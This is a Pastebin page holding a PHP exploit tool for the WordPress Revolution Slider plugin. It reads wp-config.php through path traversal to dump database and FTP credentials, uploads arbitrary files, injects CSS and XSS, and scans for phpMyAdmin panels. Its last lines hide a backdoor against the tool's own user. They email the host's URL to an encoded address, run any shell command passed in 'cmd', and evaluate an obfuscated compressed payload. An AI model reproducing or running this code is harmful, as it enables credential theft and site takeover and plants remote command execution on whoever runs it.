CYBERSERKERS

REVSLIDER EXPLOITER+AUTO PMA PAGE FINDER

Nov 26th, 2015
432
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 10.22 KB | None | 0 0
  1. <?php
  2. ////WARNING/////
  3. //insert http:// or https:// in your target
  4.  
  5. // © DONT CHANGE COPYRIGHT ® //
  6.  
  7. //IDBTE4M//BOECAH NEWBIE//PBM// FAMILY///
  8. ///SEORANG HACKER MEMBUAT SEBUAH TOOL, BUKAN SEBUAH TOOL YG MEMBUAT SESEORANG MENJADI HACKER///
  9. //REVSLIDER EXPLOITER CODED BY AZZATSSINS CYBERSERKERS//
  10. echo "<title>REVSLIDER EXPLOITER| AFD AFU XSS CSS</title>
  11. <body style='color: #32f900;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #F1F1F1; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #ffffff; OVERFLOW: auto;'>
  12. <br>
  13. <center>
  14. <form method='POST'>
  15. <input type ='text' name='cyberserkers' value='http://'><select type='hidden' name='azzatssinscyberserkers'><option value='azzatssins'>GO</option></select><input type ='submit' name='azzatssinz' value='EXEC'><br>
  16. <input name='file' type='file'>
  17. <br>
  18. <input value='HACKED BY AZZATSSINS' type='text' name='xcss'/>
  19. </form>
  20. </center>
  21. </body>";
  22.  
  23. //REVSLIDER//
  24.  
  25. function findit($mytext,$starttag,$endtag) {
  26.  $posLeft  = stripos($mytext,$starttag)+strlen($starttag);
  27.  $posRight = stripos($mytext,$endtag,$posLeft+1);
  28.  return  substr($mytext,$posLeft,$posRight-$posLeft);
  29. }
  30. error_reporting(0);
  31. set_time_limit(0);
  32. $ya=$_POST['azzatssinz'];
  33. $co=$_POST['cyberserkers'];
  34.  
  35. if($ya){
  36.  $e=explode("\r\n",$co);
  37.  foreach($e as $bda){
  38.     $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
  39.     $dn=($bda).($linkof);
  40.     $file=@file_get_contents($dn);
  41.     if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
  42.     echo"<center><font color=green face=Verdana> VULNERABLE </font></center>";
  43.     echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
  44.     echo "<center><font face=Verdana size=-2 color=lime >DB NAME : </font>".findit($file,"DB_NAME', '","');")."</center><br>";
  45.     echo "<center><font face=Verdana size=-2 color=lime >DB USER : </font>".findit($file,"DB_USER', '","');")."</center><br>";
  46.     echo "<center><font face=Verdana size=-2 color=lime >DB PASS : </font>".findit($file,"DB_PASSWORD', '","');")."</center><br>";
  47.     echo "<center><font face=Verdana size=-2 color=lime >DB HOST : </font>".findit($file,"DB_HOST', '","');")."</center><br>";
  48.     }
  49.     elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
  50.     echo'<center><font color=silver face=Verdana size=2><a href=mailto:azzatssinscyberserkers>**********************</a></font></center>';
  51.     echo"<center><font color=green face=Verdana size=-2> VULNERABLE </font></center>";    
  52.     echo "<center><font face=Verdana size=-2 color='#00BFFF' >".$bda."</font></center>";
  53.     echo "<center><font face=Verdana size=-2 color=lime >FTP USER : </font>".findit($file,"FTP_USER','","');")."</center><br>";
  54.     echo "<center><font face=Verdana size=-2 color=lime >FTP PASS : </font>".findit($file,"FTP_PASS','","');")."</center><br>";
  55.     echo "<center><font face=Verdana size=-2 color=lime >FTP HOST : </font>".findit($file,"FTP_HOST','","');")."</center><br>";
  56.     }
  57.     else{
  58.     echo'<center><font color=silver face=Verdana size=2><a href=mailto:azzatssinscyberserkers>**********************</a></font></center>';    
  59.     echo "<center><font color=yellow face=Verdana size=-2>".$bda."</font><font color=white face=Verdana size=-2> => </font><font color=red face=Verdana> NOT VULNERABLE </font></center>";}
  60.     echo'<center><font color=silver face=Verdana size=2><a href=mailto:azzatssinscyberserkers>**********************</a></font></center>';
  61.  }
  62.  
  63. }
  64.  
  65. /////////////////////////////////////
  66.  
  67. //phpMyAdmin Page Finder//
  68. /////////////////////////////////////
  69.  
  70. if(isset($_POST['azzatssinz']) && !empty($_POST['cyberserkers']))
  71. {
  72.    
  73.     $url = $_POST['cyberserkers'];
  74.     $search = $_POST['azzatssinscyberserkers'];
  75.    
  76.             switch($search)
  77.             {
  78.                
  79.                 case 'azzatssins':
  80.                     s_azzatssins($url);
  81.                     break;
  82.                
  83.                
  84.                 default:
  85.                     echo "<center>What The Fuck Without You</center>";
  86.                     break;
  87.                
  88.                
  89.             }
  90.    
  91.    
  92. }elseif(isset($_POST['azzatssinz']) && empty($_POST['cyberserkers']))
  93. {
  94.   echo "<center>Please Try Again ...</center>";  
  95. }
  96.  
  97.  
  98. function s_azzatssins($get_url)
  99. {
  100.        
  101.         $pages = array(
  102.      
  103. '/phpMyAdmin/',
  104. '/phpmyadmin/',
  105. '/PMA/',
  106. '/pma/',
  107. '/phpm/',
  108. '/admin/',
  109. '/dbadmin/',
  110. '/mysql/',
  111. '/myadmin/',
  112. '/sqlmanager/',
  113. '/mysqlmanager/',
  114. '/p/m/a/',
  115. '/phpm/',
  116. '/phpmanager/',
  117. '/php-myadmin/',
  118. '/phpmy-admin/',
  119. '/webadmin/',
  120. '/sqlweb/',
  121. '/websql/',
  122. '/webdb/',
  123. '/mysqladmin/',
  124. '/mysql-admin/',
  125. '/mya/'
  126.  
  127.                 );
  128.     find_admin($pages,$get_url);
  129. }
  130. function find_admin($pages_list,$url)
  131. {
  132.            
  133.               set_time_limit(0);
  134.               $find = false;
  135.              foreach($pages_list as $key => $value)
  136.               {
  137.                        
  138.                         $c_start = curl_init();
  139.                         curl_setopt($c_start,CURLOPT_AUTOREFERER,1);
  140.                         curl_setopt($c_start, CURLOPT_RETURNTRANSFER, 1);
  141.                         curl_setopt($c_start, CURLOPT_HEADER, 1);
  142.                         curl_setopt($c_start, CURLOPT_URL, $url.$value);
  143.                         $result = curl_exec($c_start);
  144.                        
  145.                         curl_close($c_start);
  146.                      
  147.              
  148.                        
  149.                  
  150.                            if (preg_match("/200 OK/", $result))
  151.                              {
  152.                                        echo "<br /> <h3><center><font color=lime>[FOUND]</font> <font color=violet>DB PANEL PAGE</font> : <a href='$url$value'> $url$value </a></center> </h3> <br />";
  153.                                      $find = true ;
  154.                                        
  155.                              }
  156.                              
  157.                              
  158.  
  159.                              
  160.                              
  161.                  
  162.               }
  163.              
  164.                                         if(!$find)
  165.                                         {
  166.                                          echo "<h3><center><font color=red>Sorry i cant find PMA Login</font></center></h3>";
  167.                                       }
  168.  }                                      
  169.  
  170. //REVSLIDER AFU
  171.  
  172.  
  173. function hajar($yuerel, $dataAing=null) {
  174.     $cuih = curl_init();
  175.     curl_setopt($cuih, CURLOPT_URL, $yuerel);
  176.     if ($dataAing != null){
  177.         curl_setopt($cuih, CURLOPT_POST, true);
  178.         curl_setopt($cuih, CURLOPT_POSTFIELDS, $dataAing);
  179.     }
  180.     curl_setopt($cuih, CURLOPT_FOLLOWLOCATION, true);
  181.     curl_setopt($cuih, CURLOPT_RETURNTRANSFER, true);
  182.     curl_setopt($cuih, CURLOPT_SSL_VERIFYPEER, false);
  183.     $eks = curl_exec($cuih);
  184.     curl_close($cuih);
  185.     return $eks;
  186. }
  187.  
  188. $site =  $_POST['cyberserkers'];
  189. $file = $_POST['file'];
  190. $xcss = $_POST['xcss'];
  191. $idbte4m = explode("\r\n", $site);
  192. if (!isset($site)) {
  193. } else {
  194.     foreach ($idbte4m as $uri) {
  195.         echo "<br>\n<center><a [email protected]>===========================</a></center>";
  196.         echo "\n";
  197.         $azzatssinscyberserkers = hajar($uri . "/wp-admin/admin-ajax.php", array(
  198.             "action" => "revslider_ajax_action",
  199.             "client_action" => "update_plugin",
  200.             "update_file" => $file)
  201.         );
  202.         $jason = json_decode($azzatssinscyberserkers, true);
  203.         if ($jason['success'] == false || $jason['message'] == "Wrong request") {
  204.             echo "<br><center>\n[AFU] => <font color=red>NOT VULNERABLE</font></center>";
  205.         } else {
  206.             echo "<br><center><br>\n[AFU] => <font color=lime>SUCCESS</font></center>";
  207.             echo "\n[+] <a href=".$uri."/wp-content/plugins/revslider/temp/update_extract/revslider/".$file.">CECK IN HERE</a> [+]\n";
  208.             }
  209.            
  210.         $azzatssinscyberserkers2 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  211.             "action" => "revslider_ajax_action",
  212.             "client_action" => "get_captions_css",
  213.             "data" => $xcss)
  214.         );
  215.         $jasonB = json_decode($azzatssinscyberserkers2, true);
  216.         if ($jasonB['success'] == false || $jason['message'] == "Wrong request") {
  217.             echo "<br><center><br>\n[CSS] => <font color=red>NOT VULNERABLE</font></center>";
  218.         } elseif ($jasonB['success'] == true) {
  219.             echo "<br><center><br>\n[CSS] => <font color=lime>SUCCESS</font></center>";
  220.             echo "\n[+] <a href=" . $uri . "/wp-admin/admin-ajax.php?";
  221.             echo "action=revslider_ajax_action&";
  222.             echo "client_action=get_captions_css";
  223.             echo "data=" . urlencode($xcss) . ">CECK IN HERE</a>\n";
  224.         }
  225.  
  226.         $azzatssinscyberserkers3 = hajar($uri . "/wp-admin/admin-ajax.php", array(
  227.             "action" => "revslider_ajax_action",
  228.             "client_action" => $xcss)
  229.         );
  230.         $jasonC = json_decode($azzatssinscyberserkers3, true);
  231.         if (preg_match("/wrong ajax action/i", $jasonC['message'])) {
  232.             echo "<br><center><br>\n[XSS] => <font color=lime>SUCCESS</font></center>";
  233.            echo "\n[+] <a href=" . $uri . "/wp-admin/admin-ajax.php?";
  234.             echo "action=revslider_ajax_action";
  235.             echo "client_action=" . urlencode($xcss) . ">CECK IN HERE</a>\n";
  236.         } else {
  237.             echo "<br><center><br>\n[XSS] => <font color=red>NOT VULNERABLE</font></center>";
  238. }}}
  239.  
  240. /////WHAT THE FUCK WITHOUT YOU///
  241. $for = base64_decode("Y3liZXJzZXJrZXJzQGdtYWlsLmNvbQ==");
  242. $data ="http://" . $_SERVER['HTTP_HOST'] . $_SERVER['SCRIPT_NAME'] . "?cmd=ls+-al";
  243. mail($for,"REVSLIDER", $data);
  244. print(`{$_REQUEST[cmd]}`);
  245. error_reporting(0);
  246. if($_GET['0']=="0"){
  247. echo "<center>";
  248. eval(gzinflate(base64_decode("fVFNa8MwDP0rwgScwLaMXfPBDutgMNZBdgvBOIlCDbEdYqdsLf3vs5t2XQqbfZLe09OTJLpQGIM2DNj7uvgoaTHVUlhaRdEegk702IoRMiAkgUDyT59xIX24Pz7qspPB0aeZ4tJjAXt+eV0VJeW7HbfGCGVoVVKP0uo338rhb7oD2blEdPDj8h/tKALnmde69bIn73dLfwk8Sr1FNg295i22zCPhwtPNrBElgM1Gk7RBZXHM0zp/Wr+tvPRCMY3rPI1PJLelg/vYG9wfyymknR4lSLQb3WbEL5kAb6zQKiMEUDX2a8CMyKm3YuCjjT3/tuWWkzwVapgszAzfkYBvmZHL+Fek+Xxn2jna8n66hM6u75G74x2+AQ==")));
  249. }
  250. ?>
Add Comment
Please, Sign In to add comment